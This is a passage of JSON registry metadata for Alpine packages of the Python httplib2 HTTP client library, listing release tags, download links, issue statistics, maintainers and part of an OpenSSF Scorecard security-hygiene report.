ttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T20:28:54.756Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-httplib2-pyc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.22","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2-pyc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2-pyc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2-pyc/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-httplib2-pyc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-httplib2-pyc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-httplib2-pyc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-httplib2-pyc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-httplib2-pyc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-httplib2-pyc/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":118,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2025-06-08T15:32:03.962Z","updated_at":"2025-06-08T15:32:03.962Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.22","url":"https://pkgs.alpinelinux.org/packages?branch=v3.22","ecosystem":"alpine","default":false,"packages_count":26323,"maintainers_count":422,"namespaces_count":2,"keywords_count":4638,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1803},"icon_url":"https://github.com/alpinelinux.png","created_at":"2025-06-05T10:49:56.987Z","updated_at":"2026-08-24T05:06:25.345Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/namespaces"}},{"id":6169580,"name":"py3-httplib2","ecosystem":"alpine","description":"Python3 HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2021-07-19T18:55:23.000Z","latest_release_published_at":"2021-07-19T18:55:23.000Z","latest_release_number":"0.19.1-r0","last_synced_at":"2026-03-10T13:01:16.694Z","created_at":"2023-02-01T00:06:39.126Z","updated_at":"2026-08-21T21:50:41.582Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.15/community/x86_64/py3-httplib2","install_command":"apk add py3-httplib2","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous 